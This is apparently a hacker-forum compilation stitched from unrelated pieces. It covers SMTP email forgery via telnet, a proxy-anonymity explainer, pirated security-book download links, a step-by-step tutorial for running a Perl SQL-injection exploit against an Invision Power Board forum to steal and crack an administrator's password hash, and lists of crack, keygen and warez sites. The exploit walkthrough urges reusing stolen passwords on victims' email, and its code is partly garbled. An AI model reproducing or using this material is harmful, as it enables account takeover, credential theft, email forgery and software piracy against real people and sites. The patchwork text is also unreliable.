However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:

220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:
250 Requested mail action okay, completed
data
354 Start main input; end with .
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word
followed by a colon, and the a line followed by "return". As soon as
you write a line that doesn't begin this way, the rest of what you
type goes into the body of the email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.

You can forge email on techbroker.com within one strict limitation.
Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet:

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:
user xyz
+OK user is known

Then type in this:
pass test
+OK mail drop has 2 message(s)

retr 1
+OK message follows
This is a test.

If you want to know all possible commands, give this command:

help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Unless you use a weird online provider like AOL, you can use these
same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email
sending computer(s).

How to Telnet with Windows XP

The queen of hacker commands is telnet. To get Windows help for
telnet, in the cmd.exe window give the command:

C:\>telnet /?

Here's what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]
-a Attempt automatic logon. Same as -l option except uses
the currently logged on user's name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system.
Requires that the remote system support the TELNET ENVIRON
option.
-t Specifies terminal type.
Supported term types are vt100, vt52, ansi and vtnt only.
host Specifies the hostname or IP address of the remote computer
to connect to.

port Specifies a port number or service name.

****************
Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn?t block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name.
****************

The simplest use of telnet is to log into a remote computer. Give the
command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may
get the message:

login:

Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.

****************
Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.
****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn't work?

Every day people write to me complaining they can't telnet. That is
usually because they try to telnet into a computer, or a port on a
computer that is set up to refuse telnet connections. Here's what it
might look like when a computer refuses a telnet connection:

C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

Or you might see:

C:\ >telnet techbroker.com
Connecting To techbroker.com...Could not open connection to the host, on port 23.
No connection could be made because the target machine actively
refused it.

If you just give the telnet command without giving a port number, it
will automatically try to connect on port 23, which sometimes runs a
telnet server.

**************
Newbie note: your Windows computer has a telnet client program,
meaning it will let you telnet out of it. However you have to install
a telnet server before anyone can telnet into port 23 on your
computer.
*************

If telnet failed to connect, possibly the computer you were trying to
telnet into was down or just plain no longer in existence. Maybe the
people who run that computer don't want you to telnet into it.

How to Telnet into a Shell Account

Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at
. You can get a free SSH client program from
.

One reason most hackers have shell accounts on Internet servers is because you can meet the real hackers there. When you've logged in, give the command w or who. That gives a list of user names. You can talk to other users with tht talk command. Another fun thing, if your shell account allows it, is to give the command

ps -auxww

It might tell you what commands and processes other users are running. Ask other users what they are doing and they might teach you something. Just be careful not to be a pest!

***************
You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.
*************

Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer,
here's what happens:

C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on
port 25.
No connection could be made because the target machine actively
refused it.

However, if I log into an account on 10.0.0.3 and then telnet from
inside to port 25, here's what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical
address meaning localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep
people from using it to try to break in or to forge email. Now the
ubergeniuses reading this will start to make fun of me because no
Internet address that begins with 10. is reachable from the Internet.
However, sometimes I place this "test-box" computer online with a
static Internet address, meaning whenever it is on the Internet, it
always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.

***************
Newbie note: What is all this about headers? It's stuff at the
beginning of an email that may - or may not - tell you a lot about
where it came from and when. To see full headers, in Outlook click
view -> full headers. In Eudora, click the "Blah blah blah" icon.
****************

Part I: The Magic of DOS

In this guide you will learn how to telnet , forge email, use
nslookup and netcat with Windows XP.

So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?

****************
Luser Alert: Anyone who thinks this GTMHH will reveal how to blow up people's TV sets and steal Sandra Bullock's email is going to find out that I won't tell them how.
****************

The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating systems.

The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won?t run right in cmd.exe will work in command.com

****************
Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can compare cmd.exe to bash if I want to. Nanny nanny nah nah.
****************

DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.

****************
You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs. along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. We will cover NetBIOS commands in the next Guide to XP Hacking.

Anonymity of Proxy

The exchange of information in Internet is made by the "client - server" model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, ...)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider?s name and e-mail
your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT ? so called "a user?s agent". For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

HTTP_HOST ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, ...). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables "hide" from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how environment variables "hided" by proxy servers, there are several types of proxies
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.
Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies

These proxy servers are also called "high anonymity proxy". In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

Wiley The Web Application Hackers Handbook



TITLE : The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws (Paperback)
AUTHOR : by Dafydd Stuttard (Author), Marcus Pinto (Author)
PUBLISHER : Wiley publisher
ISBN : 0470170778
EDITION : 1st
PUB DATE : October 22, 2007
LANGUAGE : English
RLS DATE : 12/02/2007

MAKER : BBL
SUPPLIER : BBL
PACKAGER : BBL
FORMAT : PDF
SIZE : 02 x 2.88 MB

[ R e l e a s e N o t e s ]

This book is a practical guide to discovering and exploiting security
flaws in web applications. The authors explain each category of
vulnerability using real-world examples, screen shots and code extracts.
The book is extremely practical in focus, and describes in detail the
steps involved in detecting and exploiting each kind of security
weakness found within a variety of applications such as online banking,
e-commerce and other web applications. The topics covered include
bypassing login mechanisms, injecting code, exploiting logic flaws and
compromising other users. Because every web application is different,
attacking them entails bringing to bear various general principles,
techniques and experience in an imaginative way. The most successful
hackers go beyond this, and find ways to automate their bespoke attacks.
This handbook describes a proven methodology that combines the virtues
of human intelligence and computerized brute force, often with
devastating results. The authors are professional penetration testers
who have been involved in web application security for nearly a decade.
They have presented training courses at the Black Hat security
conferences throughout the world. Under the alias "PortSwigger", Dafydd
developed the popular Burp Suite of web application hack tools.

Link for download:- http://w15.easy-share.com/13783591.html

>

Firewall Fundamentals


ISBN: 1587052210
Author: Wes Noonan / Ido Dubrawsky
Publisher: Cisco Press
Summary:

The essential guide to understanding and using firewalls to protect personal computers and your network

• An easy-to-read introduction to the most commonly deployed network security device
• Understand the threats firewalls are designed to protect against
• Learn basic firewall architectures, practical deployment scenarios, and common management and troubleshooting tasks
• Includes configuration, deployment, and management checklists

Increasing reliance on the Internet in both work and home environments has radically increased the vulnerability of computing systems to attack from a wide variety of threats. Firewall technology continues to be the most prevalent form of protection against existing and new threats to computers and networks. A full understanding of what firewalls can do, how they can be deployed to maximum effect, and the differences among firewall types can make the difference between continued network integrity and complete network or computer failure. Firewall Fundamentals introduces readers to firewall concepts and explores various commercial and open source firewall implementations--including Cisco, Linksys, and Linux--allowing network administrators and small office/home office computer users to effectively choose and configure their devices. Firewall Fundamentals is written in clear and easy-to-understand language and helps novice users understand what firewalls are and how and where they are used. It introduces various types of firewalls, first conceptually and then by explaining how different firewall implementations actually work. It also provides numerous implementation examples, demonstrating the use of firewalls in both personal and business-related scenarios, and explains how a firewall should be installed and configured. Additionally, generic firewall troubleshooting methodologies and common management tasks are clearly defined and explained.

URL:

Code:

http://www.amazon.com/exec/obidos/redirect?tag=songstech-20&path=ASIN%2F1587052210

Code:

http://rapidshare.com/files/74286503/fwfundamentals.rar

Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research


ISBN: 1597490741
Author: James Foster
Publisher: Syngress
Summary:
This is the first book available for the Metasploit Framework (MSF), which is the attack platform of choice for one of the fastest growing careers in IT security: Penetration Testing. The book and companion Web site will provide professional penetration testers and security researchers with a fully integrated suite of tools for discovering, running, and testing exploit code.

This book discusses how to use the Metasploit Framework (MSF) as an exploitation platform. The book begins with a detailed discussion of the three MSF interfaces: msfweb, msfconsole, and msfcli .This chapter demonstrates all of the features offered by the MSF as an exploitation platform. With a solid understanding of MSFs capabilities, the book then details techniques for dramatically reducing the amount of time required for developing functional exploits.
By working through a real-world vulnerabilities against popular closed source applications, the reader will learn how to use the tools and MSF to quickly build reliable attacks as standalone exploits. The section will also explain how to integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit module. Details as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and along the way the reader will come to understand the advantages of exploitation frameworks. The final section of the book examines the Meterpreter payload system and teaches readers to develop completely new extensions that will integrate fluidly with the Metasploit Framework.

� A November 2004 survey conducted by "CSO Magazine" stated that 42% of chief security officers considered penetration testing to be a security priority for their organizations

� The Metasploit Framework is the most popular open source exploit platform, and there are no competing books

� The book's companion Web site offers all of the working code and exploits contained within the book
URL:

Code:

http://www.amazon.com/exec/obidos/redirect?tag=songstech-20&path=ASIN%2F1597490741

Code:

http://rapidshare.com/files/74225816/Metasploit_Toolkit.rar

44 hack books

Code:

A Buffer Overflow Study - Attacks and Defenses (2002).pdf 470.27 KB Addison Wesley - 2004 - Wi-Foo The Secrets of Wireless Hacking.chm 6.73 MB Amazon Hacks - (O\'reilly-August 2003).chm 2.83 MB Computer Vulnerability(March 9 2000).pdf 390.33 KB Crackproof Your Software(No Starch-2002).pdf 7.17 MB Credit Card Visa Hack(Cambridge Lab-2003).pdf 223.34 KB Ethical Hacking and Countermeasures EC Council Exam 312 50 (OSB- 2004).chm 14.15 MB Google Hacking for Penetration Tester (Syngress-2005).pdf 13.44 MB Hack Attacks Revealed- A Complete Reference with Custom Security Hacking Toolkit (Wiley-2001).pdf 8.06 MB Hack IT Security Through Penetration Testing (Addison Wesley-2002).chm 4.58 MB Hack Proofing Your Identity in the Information Age (Syngress-2002).pdf 8.90 MB Hack Proofing Your Network - Internet Tradecraft (Syngress-2000).pdf 2.95 MB Hacker Disassembling Uncovered (A List- 2003).chm 4.72 MB Hacker's Desk Reference.pdf 714.83 KB Hackers Beware (NewRiders -2002).pdf 4.62 MB Hackers Delight( Addison Wesley- 2003 ).chm 2.11 MB Hacking Exposed- Network Security Secrets and Solutions (MCGraw-Hill-2001).pdf 8.05 MB Hacking Exposed- Web Applications (MCGraw-Hill-2002).pdf 7.58 MB Hacking Exposed- Windows 2003 Chapter 5.pdf 915.51 KB Hacking for Dummies (John Wiley-2004).pdf 9.28 MB Hacking for Dummies-Access to Other Peoples Systems Made Simple.pdf 1.26 MB Hacking Guide v3.1[www.netz.ru].pdf 1.20 MB Hacking-The Art of Exploitation(No Starch-2003).chm 1.40 MB How Thieves Targeted eBay Users but Got Stopped Instead(Interhack-June 2003).pdf 131.83 KB Malware - Fighting Malicious Code (Prentice Hall-November 21 2003).chm 6.34 MB Maximum Security, 3rd Edition(Sams-April 2001).chm 2.14 MB Maximum Security_-A Hackers Guide to Protect Your Internet .chm 1.29 MB Network Security Tools (OReilly- Apr 2005).chm 1.29 MB PC Hacks(Oct 2004).chm 5.96 MB PDF Hack(Aug 2004).chm 3.53 MB Practical Study Remote Access (Cisco-December 22, 2003).chm 2.47 MB Reversing Secrets of Reverse Engineering (Apr 2005).pdf 8.37 MB Spidering Hacks(O\'Reilly- October 2003).chm 1.39 MB Steal This Computer Book 3 What They Won\'t Tell You About the Internet(No Starch Press ??� 2003 ).chm 13.74 MB Stealing the Network; How to Own the Box ( Syngress-2003).pdf 4.59 MB The Art of Deception by Kevin Mitnick.pdf 5.19 MB The Art of Intrusion-The Real Stories Behind the Exploits of Hackers Intruders and Deceivers (Wiley- Feb 2005).pdf 3.07 MB The Complete History of Hacking.pdf 135.64 KB The Extreme Searchers Internet Handbook A Guide for the Serious Searcher (Feb 2004).pdf 7.07 MB Tricks of the Internet Gurus (April 1999).pdf 5.67 MB Underground Hacking Madness & Obsession on the Electronic Frontier (Suelette Dreyfus & Julian Assange-2001).pdf 1.48 MB Web Hacking- Attacks and Defence (Pearson Education-August 08, 2002).chm 6.32 MB Windows Server Hack(O\'Reilly - March 2004).chm 1.83 MB Windows XP Hacks (O\'reilly- Auguest 2003).chm 5.18 MB

Code:

http://rapidshare.com/files/36701929/1.rar http://rapidshare.com/files/36703610/2.rar

This is what you like to call "Hacking a forum".

I call it "Cracking into a forum" ... Learn what hacking means

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as "hackingsite".


So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:


CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}

}
if ( length($outputs) < member_id=" . $user . " pass_hash="">


What the f--k,Pretty confused, aren't you? What the f--k are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.

How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.

Your going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.

Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".

So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that your in, drag and drop "ipb.pl" from your desktop, into "bin".


Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...

What your going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD

Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin


Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

perl ipb.pl


So, this is what we need to do. Type the following command into your command prompt:

ipb.pl http://hackingsite.com/forum 2 1

Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.

Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.

Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash's before continuing reading.

Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!

LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.

There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Able", which is a great MD5 cracker availiable at 'http://odix.it'.

You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.

CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, f--k them up

But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?

Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"

Good luck!

http://serialz.to
http://serials.ws
http://keygen.us

http://www.allseek.info/(Excellent for finding keygens)
http://cracks.ms/(serials and keygens, cracks)
http://seriall.com/ (keygens and serialls)
http://www.extropia.com/tutorials/sql/toc.html
http://www.phazeddl.com/ (cracks/wares)
http://ddlspot.com/ (cracks/wares)
http://www.geekologie.com/ (geek news)
http://torrent-finder.com/ (find torrents from top-of-the-line torrent sites with one search)
http://cracks.md/ (great for cracks and keygens)
http://serialdevil.com/ (great for serials)
http://e-dll.com/ (great for cracks/serials)
http://crackbot.net/ (great for cracks/serials/gens)
http://macserialz.org/ (warez of course ? )

theserials.com - for serials
crackfind.com - for cracks

http://cracks.am
http://www.cerials.net
http://www.newcracks.net
http://www.gamecopyworld.com
http://www.100grams.com
http://www.trinsic.org
http://www.fatmacserials.com

Warez
http://www.phazeddl.com
http://ddl2.com
http://planetddl.com


And most importantly http://www.google.com ---> the ultimate hacking tool

Enjoy

A portable application, or portable app for short, is a software program that does not require any kind of formal installation onto a computer's permanent storage device to be executed, and can be stored on a removable storage device such as a CD-ROM, USB flash drive, flash card, or even a floppy disk, enabling it to be used on multiple computers. This does not mean that it can be taken and used on a different operating system, processing platform, or another computer with completely different hardware (i.e., those that are not compatible with the software as stated by its requirements), so it is not to be confused with the concept of software portability, which is the ability for software to be run or compiled with little modification on diverse computing platforms. Ideally it can be configured to read its configuration files from the same storage location as the software program files.




huge collection of Portable appz including:

Aida32
Ashampoo Burning Studio 2007
Audio Player
Avast
BitComet0.74Portable
C Cleaner
Cute FTP Pro 8.0 Portable
CyberShredder
DeepBurner_Portable
DVD Decrypter
DVD Region + CSS Free v5.9
DVD Shrink
EasyCleaner
FirefoxPortable
fusion
GetDataBack 3.03 For Fat
GIMP Portable Picture Editor
Goog.Ear.v4.2.with.Sky
HD CLEAN
HDD Life Pro 2.9.105
hddhealth
IceSword1.18en
LimeWire_4.12.3_Portable
Media Player Classic
micro
Norton Portable
Portable IDM
Portable TuneUp Utilities 2007
PortablePDFReaderPro
PowerDvd_Portable
Recover my Files 3.98 Build 5124 Portable
Spyware Doctor 4.0.0.2618 Portable
WhereIsIt 3.75 Portable
Winamp
WinRAR 3.61 Portable
winxp usb edition
Word portable
7zip 4.42 portable
Alcohol 120% 1.9.5.3823 Portable
Audio Edit Magic 9.21 Portable
AVG Anti Virus 7.5 Portable
Babylon Pro Portable
CloneDVD2 2.8.9.5 Portable
dBpowerAmp 11.5 Portable
Everest Ultimate 2006
FireFox 2.0 Portable
Internet Explorer 7 Portable
IrfanView 3.99 Portable
Kaspersky AntiVirus 6.0.1.41 Portable
LCISOCreator
Msn 7.5 Portable
Multi Password Recovery 0.2.6 Portable
Nero 7.2.0.3b Portable
P. Lightroom 1.1
Paragon Drive BackUp 6.01.041 Portable
Partition Manager 8.0 Pro Portable
Port Proxy SwitcherPro 3.7.3647 Portable
Port_APMS_6.0.4
Super Internet TV 6.8.0.0 Portable
TMPGEnc MPEG Editor 1.0.1.59 Portable
UltraISO Premium Edition 8.6.0 Build 1936 Portable
UninstallTool 1.6.6
VideoLan 0. 8.5r.2 Portable
WinAvi Video Converter 7.7 Portable
Yahoo Messenger 7.5 Portable







Passwrd mansur


C Cleaner:




Over 80 million downloads!!!
CCleaner is a freeware system optimization and privacy tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. It also cleans traces of your online activities such as your Internet history. But the best part is that it's fast (normally taking less than a second to run) and contains NO Spyware or Adware! smile.gif

Download:

http://rapidshare.com/files/52580187/C_Cleaner_by_mansur.rar

Cute FTP Pro 8.0 Portable:

CuteFTP 8 is the latest product release from GlobalSCAPE, a leading provider of managed file transfer software. The latest version of its excellent FTP client is available in both Home ($39.99) and Professional ($59.99) versions. Home offers value and ease-of-use for the casual user, while Professional maintains that ease-of-use and adds strong security and automation of tasks for business users.

Key new additions to CuteFTP 8 include PGP encryption, podcasting support (dedicated Podcast Manager feature), expanded backup options, in addition to improved search and enhancements to the interface that make it even easier to use than ever before. Really, using CuteFTP Professional 8.0 is a snap - from installing the software, to entering FTP server details and managing folder views.

CuteFTP 8 isn?t a revolution in FTP, but it is a logical evolution of GlobalSCAPE?s client application. The addition of PGP encryption to existing SSL and SSH security makes CuteFTP 8 rock solid for file transfer security and compatibility, and its Task Automation Wizards make configuring automated transfers such as site mirroring, site back-ups and scheduled transfers quick and intuitive.

You have a variety of features which enhance file transfer. The accessible interface allows you to easily update and maintain sophisticated Web sites. You can safeguard transfers of mission critical files with CuteFTP Professional?s security features, as well as speed the transfer of large architectural, graphic, or engineering files with multi-part accelerated downloads. Site caching allows you to minimise bandwidth while you browse, and you can even schedule and script FTP transactions using the autonomous Transfer Engine.

CuteFTP Professional includes the Transfer Engine (TE), and an integrated HTML editor. You can use the Transfer Engine from within CuteFTP, or with any COM enabled scripting or programming language. The HTML editor can create, open, and edit local or remote HTML documents, right in CuteFTP.

